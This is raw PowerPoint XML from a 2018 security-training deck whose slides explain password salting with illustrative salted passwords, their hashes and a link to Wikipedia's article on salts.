  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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19"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820"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821" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="822" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="823" name="Random data appended to password,…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="840306" y="4536281"/>
            <a:ext cx="22703386" cy="4643438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr sz="9300"/>
            </a:pPr>
            <a:r>
              <a:t>Random data appended to password,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr sz="9300"/>
            </a:pPr>
            <a:r>
              <a:t>that’s </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng"/>
              <a:t>different every time</a:t>
            </a:r>
            <a:r>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="824" name="https://en.wikipedia.org/wiki/Salt_(cryptography)"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051818" y="12544209"/>
            <a:ext cx="22381964" cy="44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000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Salt_(cryptography)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="825" name="info-white.png" descr="info-white.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="735727" y="12616767"/>
            <a:ext cx="309895" cy="309894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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9" name="Salting"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Salting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="830"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83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832" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="833" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="834" name="&quot;e33170b7eabcf463a410dcf3a858f3dea10c9c46&quot;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5285647" y="10194768"/>
            <a:ext cx="14616014"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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:t>"e33170b7eabcf463a410dcf3a858f3dea10c9c46"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="835" name="&quot;passwordGDuBoqfCaRMGWzk8HeYys&quot;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6117890" y="3852955"/>
            <a:ext cx="12148221"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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:t>"passwordGDuBoqfCaRMGWzk8HeYys"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="836" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12192000" y="4948766"/>
            <a:ext cx="1" cy="1608668"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="837" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12179625" y="8535271"/>
            <a:ext cx="1" cy="1635939"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="838" name="HASH"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10509514" y="6742018"/>
            <a:ext cx="3364972" cy="1608668"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12085"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3F7CA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HASH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="839" name="https://en.wikipedia.org/wiki/Salt_(cryptography)"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051818" y="12544209"/>
            <a:ext cx="22381964" cy="44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000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Salt_(cryptography)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="840" name="info-white.png" descr="info-white.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="735727" y="12616767"/>
            <a:ext cx="309895" cy="309894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="841" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9605986" y="3822825"/>
            <a:ext cx="8340793" cy="964289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="842" name="Salt"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15563719" y="1902019"/>
            <a:ext cx="1030934"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rgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Salt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="843" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="14354615" y="2589263"/>
            <a:ext cx="1071910" cy="1071909"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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7" name="Salting"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Salting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="848"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84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850" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="851" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="852" name="&quot;131f37ca3a3e22ece9a2bd2d8ad09d8055926c80&quot;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5083303" y="10194768"/>
            <a:ext cx="15020702"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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:t>"131f37ca3a3e22ece9a2bd2d8ad09d8055926c80"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="853" name="&quot;password4PyaBxc4zQboilp0cXWQN&quot;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6484366" y="3852955"/>
            <a:ext cx="11415267"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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:t>"password4PyaBxc4zQboilp0cXWQN"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="854" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12192000" y="4948766"/>
            <a:ext cx="1" cy="1608668"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="855" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12179625" y="8535271"/>
            <a:ext cx="1" cy="1635939"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="856" name="HASH"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10509514" y="6742018"/>
            <a:ext cx="3364972" cy="1608668"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12085"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3F7CA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HASH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="857" name="https://en.wikipedia.org/wiki/Salt_(cryptography)"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051818" y="12544209"/>
            <a:ext cx="22381964" cy="44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000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Salt_(cryptography)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="858" name="info-white.png" descr="info-white.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="735727" y="12616767"/>
            <a:ext cx="309895" cy="309894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="859" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9605986" y="3822825"/>
            <a:ext cx="8340793" cy="964289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="860" name="Different salt."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15203786" y="1766887"/>
            <a:ext cx="3139332"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rgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Different salt.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="861" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="14354615" y="2589263"/>
            <a:ext cx="1071910" cy="1071909"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="862" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4222773" y="10109955"/>
            <a:ext cx="16741762" cy="964289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="863" name="Different result."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16058526" y="11799075"/>
            <a:ext cx="3591026"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4000">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Different result.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="864" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="14839326" y="11350327"/>
            <a:ext cx="1078818" cy="582726"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pP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68"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86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870" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="871" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="872" name="Table"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1056078" y="3707414"/>
          <a:ext cx="22271844" cy="7625347"/>
        </p:xfrm>
        <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstCol="0" firstRow="1" lastCol="0" lastRow="0" bandCol="0" bandRow="1" rtl="0">
                <a:tableStyleId>{C7B018BB-80A7-4F77-B60F-C8B233D01FF8}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1065417"/>
                <a:gridCol w="3026846"/>
                <a:gridCol w="11468929"/>
                <a:gridCol w="6710648"/>
              </a:tblGrid>
              <a:tr h="953168">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                        <a:defRPr b="0" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="3600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>id</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnT w="12700">
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="3F7CAB"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:tabLst>
